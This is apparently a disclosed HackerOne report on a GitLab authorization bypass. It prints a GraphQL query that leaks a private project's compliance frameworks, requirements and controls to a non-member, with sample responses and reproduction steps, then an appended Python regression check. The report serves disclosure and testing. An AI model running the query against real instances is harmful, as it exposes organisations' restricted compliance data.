Bypassed CVE-2025-5195 - complianceRequirements data disclosed from complianceFrameworks query despite "security and compliance" being hidden
HackerOne report #3307422 by weasterhacker on 2025-08-20, assigned to @gandrews7:
Report
Hi team,
GitLab fixed an issue - #534960 (closed)
where an attacker can disclose all information of the Compliance Center, even when the victim has set all project features to private (repository and Compliance Center all set to be private).
Here some sensitive information is exposed, like severe requirement information, policies and controls information, and the full Compliance Center information:
compliance framework descriptions contain some information that might need to remain confidential (to the scope of the organisation at least).
GitLab fixed this issue in the 18.0.2 patch release - https://about.gitlab.com/releases/2025/06/11/patch-release-gitlab-18-0-2-released/
When the owner of a public project has made all project features private (repository, issues, merge requests and the security & compliance feature restricted to project members only),
then an attacker (non-project member) accessing the victim project - https://gitlab.com/jordenme1112-group/jordenme1112-project -
is told "Only group owners and maintainers can view the framework details", i.e. the framework description, requirements information, policies, controls information about the set API and other severe information.
Now, as an attacker who is a non-member of the victim project (where all features are restricted to project members only),
execute this GraphQL query -
query getTotalVulnerabilities($projectPath: ID!) {
  project(fullPath: $projectPath) {
    id
    complianceFrameworks {
      edges {
        node {
          id
          name
          color
          complianceRequirements {
            edges {
              node {
                id
                name
                complianceRequirementsControls {
                  edges {
                    node {
                      id
                      name
                      externalUrl
                      externalControlName
                    }
                  }
                }
                __typename
              }
            }
          }
          projects {
            edges {
              node {
                id
              }
            }
          }
          default
          description
          editPath
          updatedAt
          complianceRequirements {
            edges {
              node {
                id
                name
                description
              }
            }
          }
          __typename
        }
      }
    }
    archived
  }
}
Variables -
{
  "projectPath": "chotelalgroup/chotebabuproject"
}
Response -
{
  "data": {
    "project": {
      "id": "gid://gitlab/Project/71780971",
      "complianceFrameworks": {
        "edges": [
          {
            "node": {
              "id": "gid://gitlab/ComplianceManagement::Framework/2023155",
              "name": "victim framework",
              "color": "#cd5b45",
              "complianceRequirements": {
                "edges": [
                  {
                    "node": {
                      "id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirement/1004779",
                      "name": "ewewew",
                      "complianceRequirementsControls": {
                        "edges": [
                          {
                            "node": {
                              "id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirementsControl/12816",
                              "name": "scanner_api_security_running",
                              "externalUrl": "",
                              "externalControlName": ""
                            }
                          }
                        ]
                      },
                      "__typename": "ComplianceRequirement",
                      "description": "eewewew"
                    }
                  },
                  {
                    "node": {
                      "id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirement/1004778",
                      "name": "errere",
                      "complianceRequirementsControls": {
                        "edges": []
                      },
                      "__typename": "ComplianceRequirement",
                      "description": "errerererere"
                    }
                  }
                ]
              },
              "projects": {
                "edges": [
                  {
                    "node": {
                      "id": "gid://gitlab/Project/71780971"
                    }
                  }
                ]
              },
              "default": true,
              "description": "dffdfdfdfd",
              "editPath": "/groups/chotelalgroup/-/security/compliance_dashboard/frameworks/2023155",
              "updatedAt": "2025-08-20T21:57:55Z",
              "__typename": "ComplianceFramework"
            }
          }
        ]
      },
      "archived": false
    }
  },
  "correlationId": "a707aa7e7871dc5383b417dc891dd73f"
}
Steps to Reproduce
As Attacker -
Identify a project in GitLab with all features set to private, accessible only by project members:
https://gitlab.com/chotelalgroup/chotebabuproject
As a non-member (unauthenticated/outsider), execute the above GraphQL query.
The API discloses sensitive compliance data, e.g.:
{
  "data": {
    "project": {
      "id": "gid://gitlab/Project/71780971",
      "complianceFrameworks": {
        "edges": [
          {
            "node": {
              "id": "gid://gitlab/ComplianceManagement::Framework/2023155",
              "name": "victim framework",
              "color": "#cd5b45",
              "complianceRequirements": {
                "edges": [
                  {
                    "node": {
                      "id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirement/1004779",
                      "name": "ewewew",
                      "complianceRequirementsControls": {
                        "edges": [
                          {
                            "node": {
                              "id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirementsControl/12816",
                              "name": "scanner_api_security_running",
                              "externalUrl": "",
                              "externalControlName": ""
                            }
                          }
                        ]
                      },
                      "__typename": "ComplianceRequirement",
                      "description": "eewewew"
                    }
                  },
                  {
                    "node": {
                      "id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirement/1004778",
                      "name": "errere",
                      "complianceRequirementsControls": {
                        "edges": []
                      },
                      "__typename": "ComplianceRequirement",
                      "description": "errerererere"
                    }
                  }
                ]
              },
              "projects": {
                "edges": [
                  {
                    "node": {
                      "id": "gid://gitlab/Project/71780971"
                    }
                  }
                ]
              },
              "default": true,
              "description": "dffdfdfdfd",
              "editPath": "/groups/chotelalgroup/-/security/compliance_dashboard/frameworks/2023155",
              "updatedAt": "2025-08-20T21:57:55Z",
              "__typename": "ComplianceFramework"
            }
          }
        ]
      },
      "archived": false
    }
  },
  "correlationId": "a707aa7e7871dc5383b417dc891dd73f"
}
Confidentiality Breach -
Compliance frameworks often contain internal security policies, regulatory requirements, and control mappings that are meant for restricted organizational use.
References
GitLab Security Patch Release: 18.0.2
GitLab Issue Tracker: #534960 (closed)
CVE: CVE-2025-5195
Impact
An attacker could disclose sensitive Compliance Center data (framework descriptions, requirements, policies, and controls) from GitLab projects without authorization. This leaks confidential organizational security/compliance policies, which can be used for targeted attacks, regulatory intelligence gathering, and social engineering, even when all project features are restricted to members only.
How To Reproduce
Please add reproducibility information to this section:
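A regression check for this finding, added here as an example (not code from the report or from GitLab): it builds the request body for the report's query, trimmed to the sensitive fields, and lists every framework, requirement or control field that a non-member's response still contains, so a patched instance is one where that list is empty. The names build_request and disclosed_fields are hypothetical, and the two sample responses are constructed (condensed from the report's response).

```python
from typing import Any, Dict, List

# The report's query trimmed to the sensitive fields (assumed variable name projectPath).
COMPLIANCE_QUERY = """query complianceExposure($projectPath: ID!) {
  project(fullPath: $projectPath) {
    id
    complianceFrameworks { edges { node {
      id name description
      complianceRequirements { edges { node {
        id name description
        complianceRequirementsControls { edges { node { id name externalUrl externalControlName } } }
      } } }
    } } }
  }
}"""

def build_request(project_path: str) -> Dict[str, Any]:
    """JSON body to POST to /api/graphql as a non-member (no Authorization header)."""
    return {"query": COMPLIANCE_QUERY, "variables": {"projectPath": project_path}}

def _nodes(connection: Any) -> List[Dict[str, Any]]:
    """Unwrap a GraphQL connection ({"edges": [{"node": ...}]}); null -> no nodes."""
    return [e["node"] for e in (connection or {}).get("edges", []) if e.get("node")]

def disclosed_fields(response: Dict[str, Any]) -> List[str]:
    """Paths of non-empty framework/requirement/control fields a non-member received.
    An empty list means the server withheld compliance data (expected after 18.0.2)."""
    leaks: List[str] = []
    project = (response.get("data") or {}).get("project") or {}
    for fw in _nodes(project.get("complianceFrameworks")):
        leaks += [f"framework[{fw['id']}].{k}" for k in ("name", "description") if fw.get(k)]
        for req in _nodes(fw.get("complianceRequirements")):
            leaks += [f"requirement[{req['id']}].{k}" for k in ("name", "description") if req.get(k)]
            leaks += [f"control[{c['id']}].name"
                      for c in _nodes(req.get("complianceRequirementsControls")) if c.get("name")]
    return leaks

# Constructed samples: condensed from the report's response (leak) and the expected post-fix shape.
SAMPLE_LEAK = {"data": {"project": {"id": "gid://gitlab/Project/71780971",
    "complianceFrameworks": {"edges": [{"node": {
        "id": "gid://gitlab/ComplianceManagement::Framework/2023155",
        "name": "victim framework", "description": "dffdfdfdfd",
        "complianceRequirements": {"edges": [{"node": {
            "id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirement/1004779",
            "name": "ewewew", "description": "eewewew",
            "complianceRequirementsControls": {"edges": [{"node": {
                "id": "gid://gitlab/ComplianceManagement::ComplianceFramework::ComplianceRequirementsControl/12816",
                "name": "scanner_api_security_running"}}]}}}]}}}]}}}}
SAMPLE_FIXED = {"data": {"project": {"id": "gid://gitlab/Project/71780971",
    "complianceFrameworks": {"edges": []}}}}
```

Run disclosed_fields on the live response for each project visibility level you support; a null project, a null complianceFrameworks connection and an empty edges list all count as withheld.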